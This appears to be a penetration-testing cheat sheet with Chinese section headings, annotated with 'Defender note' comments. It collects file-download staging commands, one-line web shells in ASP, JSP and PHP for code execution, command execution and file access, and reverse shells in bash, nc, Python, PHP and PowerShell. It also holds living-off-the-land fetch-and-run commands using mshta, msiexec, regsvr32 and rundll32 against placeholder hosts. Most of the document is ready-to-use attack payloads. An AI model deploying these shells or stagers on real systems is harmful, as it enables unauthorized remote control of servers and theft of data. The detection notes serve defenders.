边界突破

Http

# Ad-hoc HTTP servers used to stage files for the download commands further down.
# All three serve the current working directory; php -S and http.server bind :8000 explicitly,
# SimpleHTTPServer defaults to :8000 as well.
# Defender note: a php/python process listening on 8000 on a host with no expected web service is a cheap alert.
php -S 0.0.0.0:8000
python2 -m SimpleHTTPServer
python3 -m http.server 8000
Shell

Curl

# Download a staged file with curl; -o writes the response body to the named local file.
# Defender note: curl fetching a bare host/path from a service account is an egress event worth keeping
# in proxy logs and process command-line telemetry.
curl http://example.com/File -o File
Shell

Wget

# Same as the curl line with wget; -O (capital) names the local output file.
# Defender note: same egress signal as curl — wget from a non-interactive account is uncommon in most fleets.
wget http://example.com/File -O File
Shell

Certutil

REM certutil repurposed as decoder/downloader (living-off-the-land pattern).
REM First line: writes a base64 string to Temp and -decode turns it into File.
REM Second line: -urlcache -split -f fetches the URL straight to File.
REM Third line: the trailing "delete" argument removes the URL-cache entry the fetch leaves behind (appears intended as cleanup).
REM Defender note: certutil with -decode or -urlcache on its command line is a well-documented LOLBAS indicator; the fetch also leaves a URL-cache artefact on disk until deleted.
echo Base64 > Temp && certutil -f -decode Temp File
certutil -urlcache -split -f http://example.com/File File
certutil -urlcache -split -f http://example.com/File delete
Shell

Bitsadmin

REM BITS used as a downloader: /transfer creates a job named "job" that writes the URL to C:\Users\Public (a directory normally writable by every local user).
REM Defender note: bitsadmin /transfer launched by anything other than the update stack is a common LOLBAS indicator; BITS jobs are also recorded in the Microsoft-Windows-Bits-Client event log.
bitsadmin /transfer job http://example.com/File C:\Users\Public\File
Shell

PowerShell

REM PowerShell one-liners invoked from cmd: WebClient.DownloadFile fetches a URL to disk; WriteAllBytes materialises a base64 blob as a file under C:\Users\Public.
REM Defender note: with Script Block Logging enabled (event 4104) both commands are captured verbatim; Net.WebClient and FromBase64String are standard hunting strings.
powershell (New-Object System.Net.WebClient).DownloadFile('http://example.com/File','File')
powershell [IO.File]::WriteAllBytes('C:\Users\Public\File',[Convert]::FromBase64String('Base64'))
PowerShell

WebShell

ASP

  • 代码执行
<%' Code-execution sinks: the "code" request parameter is handed straight to the VBScript engine (Eval / Execute / ExecuteGlobal). %>
<%' Defender note: any Eval/Execute/ExecuteGlobal whose argument comes from request() is a web-shell signature; include these tokens in web-root file-integrity and YARA-style scans. %>
<% Eval request("code") %>
<% Execute request("code") %>
<% ExecuteGlobal(request("code")) %>
ASPNet
  • 命令执行
<%' Command execution through COM: WScript.Shell.exec runs cmd.exe with the "cmd" parameter and echoes stdout; Shell.Application.ShellExecute runs it with the window hidden (last argument 0) and output is not returned. %>
<%' Defender note: the IIS worker (w3wp.exe) spawning cmd.exe is the process-tree signal to alert on; both COM object names are also easy to grep for in the web root. %>
<%= Server.CreateObject("WScript.Shell").exec("cmd.exe /c "&request("cmd")).stdout.readall %>
<%= Server.CreateObject("Shell.Application").ShellExecute("cmd.exe","/c "&request("cmd"),"","open",0) %>
ASPNet
  • 文件操作
<%' File read/write relative to the site via FileSystemObject: OpenTextFile mode 1 reads, mode 2 with create=True overwrites the file with the "data" parameter. %>
<%' Defender note: Server.MapPath on raw request input may allow traversal outside the site directory (depends on the parent-paths setting); FSO use inside a page is itself a review flag. %>
<%= Server.CreateObject("Scripting.FileSystemObject").OpenTextFile(Server.MapPath(request("file")),1,False).Readall %>
<%= Server.CreateObject("Scripting.FileSystemObject").OpenTextFile(Server.MapPath(request("file")),2,True).WriteLine(request("data")) %>
ASPNet

JSP

  • 代码执行
<%-- Code-execution sinks: the "js" ScriptEngine evaluates the "code" parameter; the URLClassLoader line loads and instantiates a request-named class from a request-supplied URL. --%>
<%-- Defender note: ScriptEngineManager and URLClassLoader inside a .jsp under the web root are strong web-shell indicators; also watch for new .jsp files appearing in exploded deployments. --%>
<% new javax.script.ScriptEngineManager().getEngineByName("js").eval(request.getParameter("code")); %>
<% new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("url"))}).loadClass(request.getParameter("class")).newInstance(); %>
Java
  • 命令执行
<%-- Command execution: both lines run bash -c with the "cmd" parameter; neither reads the process output, so nothing is returned in the response. --%>
<%-- Defender note: the servlet container's java process spawning bash/sh is the process-tree signal to alert on. --%>
<% Runtime.getRuntime().exec(new String[]{"bash","-c",request.getParameter("cmd")}); %>
<% new ProcessBuilder(new String[]{"bash","-c",request.getParameter("cmd")}).start(); %>
Java
  • 文件操作
<%-- File operations: directory listing of the "dir" parameter, byte-by-byte read of a file under the application root, and base64 decode-and-write to a file under the application root. --%>
<%-- The getRealPath("/") + parameter concatenation is not normalised, so "../" in the parameter can escape the web root. --%>
<%-- sun.misc.BASE64Decoder is an internal JDK class removed in Java 9+, so the write line will not compile on current JDKs. --%>
<% for(java.io.File name:new java.io.File(request.getParameter("dir")).listFiles()){out.println(name+"<br>");} %>
<%@ page import="java.io.FileInputStream" %><% FileInputStream File=new FileInputStream(application.getRealPath("/")+request.getParameter("file"));int Temp=0;while((Temp=File.read())!=-1){out.print((char)Temp);}File.close(); %>
<%@ page import="java.io.FileOutputStream" %><% FileOutputStream File=new FileOutputStream(application.getRealPath("/")+request.getParameter("file"));File.write(new sun.misc.BASE64Decoder().decodeBuffer(request.getParameter("data")));File.close(); %>
Java

PHP

  • 代码执行
<?php /* Code-execution sinks fed from $_REQUEST (GET, POST or cookie). The leading @ suppresses warnings so failed attempts stay out of the error log. */ ?>
<?php /* Version note: string-argument assert() and create_function() were removed in PHP 8, so the second and third lines only work on PHP 7 and earlier. */ ?>
<?php /* Defender note: eval/assert/create_function/call_user_func/array_map taking $_REQUEST values are the canonical web-shell signatures matched by most scanners. */ ?>
<?php @eval($_REQUEST['code']); ?>
<?php @assert($_REQUEST['code']); ?>
<?php $main=@create_function('',$_REQUEST['code']);$main(); ?>
<?php @call_user_func($_REQUEST['func'],$_REQUEST['code']); ?>
<?php @array_map($_REQUEST['func'],array($_REQUEST['code'])); ?>
PHP
  • 命令执行
<?php /* Command-execution sinks: system/passthru stream output directly, exec returns only the last output line, shell_exec returns all of it, pcntl_exec replaces the PHP process with bash, popen/proc_open read it from a pipe. */ ?>
<?php /* Defender note: php-fpm or apache spawning sh/bash is the process-tree signal; disable_functions in php.ini removes most of these, and pcntl_exec is commonly forgotten in that list. */ ?>
<?php @system($_REQUEST['cmd']); ?>
<?php @passthru($_REQUEST['cmd']); ?>
<?php echo @exec($_REQUEST['cmd']); ?>
<?php echo @shell_exec($_REQUEST['cmd']); ?>
<?php @pcntl_exec('/bin/bash',array('-c',$_REQUEST['cmd'])); ?>
<?php $x=@popen($_REQUEST['cmd'], "r");echo stream_get_contents($x);pclose($x); ?>
<?php $x=@proc_open($_REQUEST['cmd'],array(1=>array("pipe","w")),$y);echo stream_get_contents($y[1]);proc_close($x); ?>
PHP
  • 文件操作
<?php /* File read, directory listing and base64 decode-and-write, all taking paths straight from $_REQUEST with no normalisation or allow-listing. */ ?>
<?php /* Defender note: open_basedir bounds where these can reach; unexpected file_put_contents writes into the web root are a file-integrity-monitoring event. */ ?>
<?php echo @file_get_contents($_REQUEST['file']); ?>
<?php echo @implode('<br>',scandir($_REQUEST['dir'])); ?>
<?php @file_put_contents($_REQUEST['file'],base64_decode($_REQUEST['data'])); ?>
PHP

反弹Shell

TTY

# Upgrades a non-interactive shell to a pseudo-terminal by spawning bash under pty.
# Defender note: python spawning bash through a pty while its stdio is still attached to a network socket is a useful EDR correlation (the socket attachment is an assumption about how this is used — verify in context).
python -c 'import pty; pty.spawn("/bin/bash")'
Shell

PHP

# PHP reverse shell: fsockopen connects to x.x.x.x:yyyy (placeholders for the listener), then an interactive bash has stdin/stdout/stderr redirected to descriptor 3, which is assumed to be the socket.
# Defender note: a php process with an outbound connection and a bash child is the detection pair.
php -r '$sock=fsockopen("x.x.x.x",yyyy);exec("/bin/bash -i <&3 >&3 2>&3");'
Shell

Bash

# Bash-only reverse shell using the /dev/tcp pseudo-device: no extra binary is spawned, so process telemetry shows just bash with a network connection.
# Defender note: /dev/tcp is a bash feature, not a real file (dash and others lack it); auditd/EDR rules usually key on bash making an outbound connect().
bash -i >& /dev/tcp/x.x.x.x/yyyy 0>&1
Shell

Ncat

# Named-pipe reverse shell for nc builds without -e: /tmp/f carries the listener's input into bash, and bash's output (2>&1) goes back out through nc.
# Defender note: the fixed path /tmp/f is an easy on-disk artefact to check for; nc with a bash sibling and an outbound connection is the process signal.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc x.x.x.x yyyy >/tmp/f
Shell

Mshta

REM mshta fetches and runs a remote .hta (HTML Application); its script runs with the user's full privileges, outside the browser sandbox.
REM Defender note: mshta.exe with a URL on its command line is a LOLBAS indicator; ASR rules or application control can block mshta outright on most endpoints.
mshta http://example.com/shell.hta
Shell

Python

# Python reverse shell: connects to x.x.x.x:yyyy, dup2()s the socket over descriptors 0/1/2, then runs an interactive bash that inherits them.
# Defender note: python with an established outbound connection and a bash child is the detection pair; the socket is visible as the shell's stdio in /proc/<pid>/fd.
python -c 'import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",yyyy));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"]);'
Shell

Msiexec

REM msiexec installs a package fetched over HTTP: /q suppresses all UI, /i installs, so any custom actions in the MSI run silently.
REM Defender note: msiexec with an http(s) URL as the /i argument is a LOLBAS indicator; MsiInstaller events in the Application log and application control help here.
msiexec /q /i http://example.com/shell.msi
Shell

Regsvr32

REM regsvr32 scriptlet pattern (MITRE T1218.010): /i:<url> makes scrobj.dll fetch and run a remote .sct; /s silent, /n skips DllRegisterServer, /u takes the unregister path.
REM Defender note: regsvr32 with scrobj.dll and a URL on its command line is a LOLBAS indicator; the .sct fetch is visible in proxy logs.
regsvr32 /s /n /u /i:http://example.com/shell.sct scrobj.dll
Shell

Rundll32

REM rundll32 abuse via the mshtml RunHTMLApplication export: the javascript: URL runs in the HTA engine, launches "shell" through WScript.Shell, then closes the window.
REM Defender note: rundll32 with "javascript:" or mshtml on its command line is a LOLBAS indicator that is straightforward to alert on.
rundll32 javascript:"\..\mshtml,RunHTMLApplication ";new%20ActiveXObject("WScript.Shell").Run("shell");window.close();
Shell

PowerShell

REM PowerShell stagers. First line: IEX of DownloadString executes a remote script in memory (-nop no profile, -w hidden window).
REM Second line: a self-contained TCP reverse shell that reads from a TCPClient stream, iex()s each received chunk and writes the output back with a "PS <cwd>> " prompt.
REM Defender note: "-nop -w hidden", IEX + DownloadString and Net.Sockets.TCPClient are standard hunting strings; Script Block Logging (event 4104) records the content and AMSI sees each iex'd chunk.
powershell -nop -w hidden -c "IEX((New-Object Net.WebClient).DownloadString('http://example.com/shell'))"
powershell -nop -c "$TCP=New-Object System.Net.Sockets.TCPClient('x.x.x.x',yyyy);$CMD=$TCP.GetStream();[byte[]]$Bytes = 0..65535|%{0};while(($I=$CMD.Read($Bytes,0,$Bytes.Length)) -ne 0){$Send=[Text.Encoding]::ASCII.GetBytes((iex(New-Object -TypeName System.Text.ASCIIEncoding).GetString($Bytes,0,$I) 2>&1 | Out-String)+'PS '+(pwd).Path+'> ');$CMD.Write($Send,0,$Send.Length);$CMD.Flush()};$TCP.Close()"
PowerShell